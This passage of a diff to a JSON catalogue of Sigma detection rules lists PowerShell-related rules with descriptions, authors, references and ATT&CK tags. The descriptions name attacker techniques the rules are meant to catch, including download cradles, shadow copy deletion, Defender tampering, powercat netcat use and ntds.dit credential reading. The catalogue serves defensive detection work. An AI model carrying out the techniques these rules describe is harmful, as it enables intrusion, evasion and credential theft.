"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_wsman_com_provider_no_powershell.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.003" + ] + }, + "uuid": "df9a0e0e-fedb-4d6c-8668-d765dfc92aa7", + "value": "Suspicious Non PowerShell WSMAN COM Provider" + }, + { + "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", + "meta": { + "author": "frack113", + "creation_date": "2021/12/10", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pc_susp_get_nettcpconnection.yml", + "level": "low", + "logsource.category": "ps_classic_start", + "logsource.product": "windows", + "refs": [ + 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-2---system-network-connections-discovery-with-powershell", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_susp_get_nettcpconnection.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1049" + ] + }, + "uuid": "b366adb4-d63d-422d-8a2c-186463b5ded0", + "value": "Use Get-NetTCPConnection" + }, + { + "description": "Detects remote PowerShell sessions", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/08/10", + "falsepositive": [ + "Legitimate use remote PowerShell sessions" + ], + "filename": "posh_pc_remote_powershell_session.yml", + "level": "high", + "logsource.category": "ps_classic_start", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_remote_powershell_session.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" + ] + }, + "uuid": "60167e5c-84b2-4c95-a7ac-86281f27c445", + "value": "Remote PowerShell Session (PS Classic)" + }, + { + "description": "Detects PowerShell called from an executable by the version mismatch method", + "meta": { + "author": "Sean Metcalf (source), Florian Roth (rule)", + "creation_date": "2017/03/05", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pc_exe_calling_ps.yml", + "level": "high", + "logsource.category": "ps_classic_start", + "logsource.product": "windows", + "refs": [ + "https://adsecurity.org/?p=2921", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_exe_calling_ps.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": 
"c70e019b-1479-4b65-b0cc-cd0c6093a599", + "value": "PowerShell Called from an Executable Version Mismatch" + }, + { + "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", + "meta": { + "author": "frack113", + "creation_date": "2021/07/13", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pc_susp_athremotefxvgpudisablementcommand.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_susp_athremotefxvgpudisablementcommand.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "f65e22f9-819e-4f96-9c7b-498364ae7a25", + "value": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand - PowerShell" + }, + { + "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/08/11", + "falsepositive": [ + "Programs using PowerShell directly without invocation of a dedicated interpreter", + "MSP Detection Searcher", + "Citrix ConfigSync.ps1" + ], + "filename": "posh_pc_alternate_powershell_hosts.yml", + "level": "medium", + "logsource.category": "ps_classic_start", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190815181010.html", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_alternate_powershell_hosts.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "d7326048-328b-4d5e-98af-86e84b17c765", + "value": "Alternate PowerShell Hosts" + }, + { + "description": "Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0", + "meta": { + "author": "Florian Roth (rule), Lee Holmes (idea), Harish Segar (improvements)", + "creation_date": "2017/03/22", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pc_downgrade_attack.yml", + "level": "medium", + "logsource.category": "ps_classic_start", + "logsource.product": "windows", + "refs": [ + "http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_downgrade_attack.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "6331d09b-4785-4c13-980f-f96661356249", + "value": "PowerShell Downgrade Attack - PowerShell" + }, + { + "description": "Shadow Copies deletion using operating systems utilities via PowerShell", + "meta": { + "author": "frack113", + "creation_date": "2021/06/03", + "falsepositive": [ + "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason" + ], + "filename": "posh_pc_delete_volume_shadow_copies.yml", + "level": "high", + "logsource.category": "ps_classic_start", + "logsource.product": "windows", + "refs": [ + "https://www.fortinet.com/blog/threat-research/stomping-shadow-copies-a-second-look-into-deletion-methods", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_delete_volume_shadow_copies.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + ] + }, + "uuid": "87df9ee1-5416-453a-8a08-e8d4a51e9ce1", + "value": "Delete Volume Shadow Copies Via WMI With PowerShell" + }, + { + "description": "Detects suspicious powershell process which includes bxor command, alternative obfuscation method to b64 encoded commands.", + "meta": { + "author": "Teymur Kheirkhabarov, Harish Segar (rule)", + "creation_date": "2020/06/29", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pc_xor_commandline.yml", + "level": "medium", + "logsource.category": "ps_classic_start", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=46", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_xor_commandline.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "812837bb-b17f-45e9-8bd0-0ec35d2e3bd6", + "value": "Suspicious XOR Encoded PowerShell Command Line - PowerShell" + }, + { + "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "meta": { + "author": "frack113", + "creation_date": "2021/07/20", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pc_susp_zip_compress.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_susp_zip_compress.yml" + ], + "tags": [ + "attack.collection", + "attack.t1074.001" + ] + }, + "uuid": "71ff406e-b633-4989-96ec-bc49d825a412", + "value": "Zip A Folder With PowerShell For Staging In Temp - 
PowerShell" + }, + { + "description": "Detects suspicious PowerShell download command", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/05", + "falsepositive": [ + "PowerShell scripts that download content from the Internet" + ], + "filename": "posh_pc_susp_download.yml", + "level": "medium", + "logsource.category": "ps_classic_start", + "logsource.product": "windows", + "refs": [ + "https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_susp_download.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "3236fcd0-b7e3-4433-b4f8-86ad61a9af2d", + "value": "Suspicious PowerShell Download" + }, + { + "description": "Detects renamed powershell", + "meta": { + "author": "Harish Segar, frack113", + "creation_date": "2020/06/29", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pc_renamed_powershell.yml", + "level": "low", + "logsource.category": "ps_classic_start", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_renamed_powershell.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "30a8cb77-8eb3-4cfb-8e79-ad457c5a4592", + "value": "Renamed Powershell Under Powershell Channel" + }, + { + "description": "Attempting to disable scheduled scanning and other parts of windows defender atp. 
Or set default actions to allow.", + "meta": { + "author": "frack113", + "creation_date": "2021/06/07", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pc_tamper_with_windows_defender.yml", + "level": "high", + "logsource.category": "ps_classic_provider_start", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_tamper_with_windows_defender.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "ec19ebab-72dc-40e1-9728-4c0b805d722c", + "value": "Tamper Windows Defender - PSClassic" + }, + { + "description": "Detects suspicious powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records", + "meta": { + "author": "Sai Prashanth Pulisetti @pulisettis", + "creation_date": "2022/12/10", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pc_abuse_nslookup_with_dns_records.yml", + "level": "medium", + "logsource.category": "ps_classic_start", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Alh4zr3d/status/1566489367232651264", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_abuse_nslookup_with_dns_records.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "999bff6d-dc15-44c9-9f5c-e1051bfc86e1", + "value": "Nslookup PowerShell Download Cradle" + }, + { + "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/08/11", + "falsepositive": [ + "Programs using PowerShell directly without invocation of a dedicated interpreter", + "MSP Detection Searcher", + "Citrix ConfigSync.ps1" + ], + "filename": 
"posh_pm_alternate_powershell_hosts.yml", + "level": "medium", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "64e8e417-c19a-475a-8d19-98ea705394cc", + "value": "Alternate PowerShell Hosts - PowerShell Module" + }, + { + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "meta": { + "author": "Jonathan Cheong, oscd.community", + "creation_date": "2020/10/15", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_invoke_obfuscation_stdin.yml", + "level": "high", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_stdin.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "9ac8b09b-45de-4a07-9da1-0de8c09304a3", + "value": "Invoke-Obfuscation STDIN+ Launcher - PowerShell Module" + }, + { + "description": "focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including\nCobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads \nthat often undergo minimal changes by attackers due to bad opsec.\n", + "meta": { + "author": "ok @securonix invrep_de, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Moderate-to-low; Despite the shorter length/lower entropy for some of these, because of high specificity, fp appears to be fairly limited in many environments." 
+ ], + "filename": "posh_pm_bad_opsec_artifacts.yml", + "level": "critical", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/", + "https://www.mdeditor.tw/pl/pgRt", + "https://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_bad_opsec_artifacts.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "8d31a8ce-46b5-4dd6-bdc3-680931f1db86", + "value": "Bad Opsec Powershell Code Artifacts" + }, + { + "description": "A General detection for the Get-Clipboard commands in PowerShell logs. This could be an adversary capturing clipboard contents.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/05/02", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_get_clipboard.yml", + "level": "medium", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/evals/apt29/detections/7.A.2_F4609F7E-C4DB-4327-91D4-59A58C962A02.html", + "https://github.com/OTRF/detection-hackathon-apt29/issues/16", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_get_clipboard.yml" + ], + "tags": [ + "attack.collection", + "attack.t1115" + ] + }, + "uuid": "4cbd4f12-2e22-43e3-882f-bff3247ffb78", + "value": "PowerShell Get Clipboard" + }, + { + "description": "A General detection for specific decompress commands in PowerShell logs. 
This could be an adversary decompressing files.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/05/02", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_decompress_commands.yml", + "level": "informational", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/8", + "https://threathunterplaybook.com/evals/apt29/detections/4.A.3_09F29912-8E93-461E-9E89-3F06F6763383.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_decompress_commands.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1140" + ] + }, + "uuid": "1ddc1472-8e52-4f7d-9f11-eab14fc171f5", + "value": "PowerShell Decompress Commands" + }, + { + "description": "Adversaries may attempt to find domain-level groups and permission settings.\nThe knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as domain administrators.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/15", + "falsepositive": [ + "Administrator script" + ], + "filename": "posh_pm_susp_ad_group_reco.yml", + "level": "low", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_ad_group_reco.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.001" + ] + }, + "uuid": "815bfc17-7fc6-4908-a55e-2f37b98cedb4", + "value": "AD Groups Or Users Enumeration Using PowerShell - PoshModule" + }, + { + "description": "Detects Obfuscated Powershell via use Clip.exe in 
Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_invoke_obfuscation_via_use_clip.yml", + "level": "high", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_clip.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "ebdf49d8-b89c-46c9-8fdf-2c308406f6bd", + "value": "Invoke-Obfuscation Via Use Clip - PowerShell Module" + }, + { + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2020/10/13", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_invoke_obfuscation_via_var.yml", + "level": "high", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_var.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "f3c89218-8c3d-4ba9-9974-f1d8e6a1b4a6", + "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module" + }, + { + "description": "Adversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/12", + 
"falsepositive": [ + "Administrator script" + ], + "filename": "posh_pm_susp_local_group_reco.yml", + "level": "low", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_local_group_reco.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.001" + ] + }, + "uuid": "cef24b90-dddc-4ae1-a09a-8764872f69fc", + "value": "Suspicious Get Local Groups Information" + }, + { + "description": "Detects suspicious invocation of the Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials without using any credential dumpers", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/16", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_get_addbaccount.yml", + "level": "high", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/MichaelGrafnetter/DSInternals/blob/7ba59c12ee9a1cb430d7dc186a3366842dd612c8/Documentation/PowerShell/Get-ADDBAccount.md", + "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_get_addbaccount.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.003" + ] + }, + "uuid": "b140afd9-474b-4072-958e-2ebb435abd68", + "value": "Suspicious Get-ADDBAccount Usage" + }, + { + "description": "Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", + "meta": { + "author": "frack113", + "creation_date": "2021/07/21", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_powercat.yml", + "level": "medium", + "logsource.category": "ps_module", + "logsource.product": 
"windows", + "refs": [ + "https://github.com/besimorhino/powercat", + "https://nmap.org/ncat/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_powercat.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1095" + ] + }, + "uuid": "bf7286e7-c0be-460b-a7e8-5b2e07ecc2f2", + "value": "Netcat The Powershell Version - PowerShell Module" + }, + { + "description": "Detects keywords that could indicate clearing PowerShell history", + "meta": { + "author": "Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_pm_clear_powershell_history.yml", + "level": "medium", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://gist.github.com/hook-s3c/7363a856c3cdbadeb71085147f042c1a", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_clear_powershell_history.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.003" + ] + }, + "uuid": "f99276ad-d122-4989-a09a-d00904a5f9d2", + "value": "Clear PowerShell History - PowerShell Module" + }, + { + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below", + "meta": { + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "creation_date": "2019/11/08", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_invoke_obfuscation_obfuscated_iex.yml", + "level": "high", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + 
"https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_obfuscated_iex.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "2f211361-7dce-442d-b78a-c04039677378", + "value": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module" + }, + { + "description": "Detects remote PowerShell sessions", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", + "creation_date": "2019/08/10", + "falsepositive": [ + "Legitimate use remote PowerShell sessions" + ], + "filename": "posh_pm_remote_powershell_session.yml", + "level": "high", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_remote_powershell_session.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" + ] + }, + "uuid": "96b9f619-aa91-478f-bacb-c3e50f8df575", + "value": "Remote PowerShell Session (PS Module)" + }, + { + "description": "Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and\nto identify potential systems of interest for Lateral Movement.\nNetworks often contain shared network drives and folders that enable users to access file directories on various systems across a network.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/15", + "falsepositive": [ + "Administrator script" + ], + "filename": "posh_pm_susp_smb_share_reco.yml", + "level": "low", + "logsource.category": "ps_module", + 
"logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_smb_share_reco.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.001" + ] + }, + "uuid": "6942bd25-5970-40ab-af49-944247103358", + "value": "Suspicious Get Information for SMB Share - PowerShell Module" + }, + { + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/08", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_invoke_obfuscation_via_use_mhsta.yml", + "level": "high", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_mhsta.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "07ad2ea8-6a55-4ac6-bf3e-91b8e59676eb", + "value": "Invoke-Obfuscation Via Use MSHTA - PowerShell Module" + }, + { + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2020/10/18", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_invoke_obfuscation_via_compress.yml", + "level": "medium", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_compress.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": 
"7034cbbb-cc55-4dc2-8dad-36c0b942e8f1", + "value": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module" + }, + { + "description": "Detects suspicious PowerShell download command", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/05", + "falsepositive": [ + "PowerShell scripts that download content from the Internet" + ], + "filename": "posh_pm_susp_download.yml", + "level": "medium", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_download.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "de41232e-12e8-49fa-86bc-c05c7e722df9", + "value": "Suspicious PowerShell Download - PowerShell Module" + }, + { + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_invoke_obfuscation_via_stdin.yml", + "level": "high", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_stdin.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "c72aca44-8d52-45ad-8f81-f96c4d3c755e", + "value": "Invoke-Obfuscation Via Stdin - PowerShell Module" + }, + { + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "meta": { + "author": "Jonathan Cheong, oscd.community", + "creation_date": "2020/10/13", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_invoke_obfuscation_clip.yml", + "level": "high", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", 
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_clip.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "a136cde0-61ad-4a61-9b82-8dc490e60dd2", + "value": "Invoke-Obfuscation CLIP+ Launcher - PowerShell Module" + }, + { + "description": "Detects suspicious PowerShell invocation command parameters", + "meta": { + "author": "Florian Roth (rule)", + "creation_date": "2017/03/12", + "falsepositive": [ + "Very special / sneaky PowerShell scripts" + ], + "filename": "posh_pm_susp_invocation_generic.yml", + "level": "high", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_invocation_generic.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "bbb80e91-5746-4fbe-8898-122e2cafdbf4", + "value": "Suspicious PowerShell Invocations - Generic - PowerShell Module" + }, + { + "description": "Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.", + "meta": { + "author": "Ensar Şamil, @sblmsrsn, OSCD Community", + "creation_date": "2020/10/05", + "falsepositive": [ + "App-V clients" + ], + "filename": "posh_pm_syncappvpublishingserver_exe.yml", + "level": "medium", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_syncappvpublishingserver_exe.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "fe5ce7eb-dad8-467c-84a9-31ec23bd644a", + "value": "SyncAppvPublishingServer Bypass Powershell Restriction - PS Module" + }, + { + "description": "Detects 
